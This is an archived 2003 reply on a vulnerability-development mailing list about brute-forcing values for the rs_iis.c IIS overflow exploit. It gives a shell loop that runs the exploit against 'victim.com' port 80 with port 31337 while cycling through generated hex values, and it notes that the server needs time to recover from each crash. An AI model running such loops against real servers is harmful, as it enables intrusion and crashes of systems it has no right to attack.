Vulnerability Development mailing list archives
Re: Generating Hex Numbers to brute force rs_iis.c
From: Joe Stewart <jstewart () lurhq com>
Date: Tue, 1 Apr 2003 15:32:57 -0500
On Monday 31 March 2003 10:14 am, Jeremy Junginger wrote:
Basically, the goal is as follows: 1) generate Hex Numbers from 0x0000 to 0xffff in the following pattern (0x0000 0x0101 0x0202...0xfdfd 0xfefe 0xffff) 2) pass the output to rs_iis via system() command?
How about just running it from your shell like: for i in `perl -e 'for (0..255) { printf "0x%02x%02x\n", $_, $_ }'`; do \ ./rs_iis victim.com 80 31337 $i; done Remember that IIS will need time to recover from the crash caused by the overflow, so you may need to sleep for some period of time between tries. -Joe -- Joe Stewart, GCIH Senior Intrusion Analyst LURHQ Corporation http://www.lurhq.com/
Current thread:
- Generating Hex Numbers to brute force rs_iis.c Jeremy Junginger (Apr 01)
- Re: Generating Hex Numbers to brute force rs_iis.c Joe Stewart (Apr 03)
- Re: Generating Hex Numbers to brute force rs_iis.c Maarten (Apr 03)
- Re: Generating Hex Numbers to brute force rs_iis.c Blue Boar (Apr 03)
- <Possible follow-ups>
- RE: Generating Hex Numbers to brute force rs_iis.c Joshua Wright (Apr 03)